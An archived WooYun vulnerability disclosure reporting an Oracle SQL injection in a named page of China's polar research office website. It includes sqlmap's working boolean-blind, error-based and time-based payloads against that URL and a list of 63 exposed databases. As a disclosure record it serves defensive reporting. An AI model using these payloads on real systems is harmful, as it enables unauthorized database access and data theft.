乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-01-22: 细节已通知厂商并且等待厂商处理中 2014-01-27: 厂商已经确认,细节仅向厂商公开 2014-02-06: 细节向核心白帽子及相关领域专家公开 2014-02-16: 细节向普通白帽子公开 2014-02-26: 细节向实习白帽子公开 2014-03-08: 细节向公众公开
oracle注入
1、问题url
http://www.chinare.org.cn/newsList/?page=2&publishYear=2012 (GET)
2、证明,涉及n多裤
sqlmap identified the following injection points with a total of 251 HTTP(s) requests:---Place: GETParameter: publishYear Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=2&publishYear=2012) AND 8125=8125 AND (3473=3473 Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS) Payload: page=2&publishYear=2012) AND 6429=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(111)||CHR(116)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (6429=6429) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(105)||CHR(101)||CHR(97)||CHR(113)) AND (7411=7411 Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: page=2&publishYear=2012) AND 3939=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (8134=8134---web server operating system: Linux Red Hat Enterprise 6 (Santiago)web application technology: Apache 2.2.15back-end DBMS: Oracleavailable databases [63]:[*] APEX_030200[*] APPQOSSYS[*] ARCTICECOLOGY[*] AURORA[*] AURORA_V2[*] AUTH45_ARCHIVES[*] BASICDATA[*] BIRDS[*] BIRDS_OFBIZ[*] BIRDSDICIKPG[*] CCMPE[*] CHINARENADC[*] CTXSYS[*] DBSNMP[*] DP_GREATWALL_DB[*] DP_ZHONGSHAN_DB[*] DSP[*] ECOLOGY[*] ECOLOGY_V2[*] EXFSYS[*] FLOWS_FILES[*] GDDA26_T[*] GDDA45_ARCHIVES[*] GEODATA[*] GEOMAGNETISM[*] GEOSPACE[*] INTERLIB[*] IONOSPHERE[*] JIDIUSER[*] LS_COMM[*] LS_PRIC[*] MDSYS[*] METEOROLOG[*] OCEAN[*] OGG[*] OLAPSYS[*] OPENCMS[*] ORDDATA[*] ORDSYS[*] OUTLN[*] PEMSUSER[*] PERISWEB[*] PLOT[*] POLARDOOR[*] POLARER[*] PORTALFLAT[*] PRICCNLITER[*] REMOTESENSOR[*] SCOTT[*] SDE[*] SIG[*] SOFTSCIENCE[*] STATION_GW[*] STATION_ZS[*] SUBMISSION[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB[*] XLWEB
3、还有很多注入,自己查吧...提交刷分
见详细
过滤
危害等级:中
漏洞Rank:10
确认时间:2014-01-27 09:12
CNVD确认并复现所述情况,已经由CNVD直接联系国家海洋局极地办公室,向其通报漏洞情况。
暂无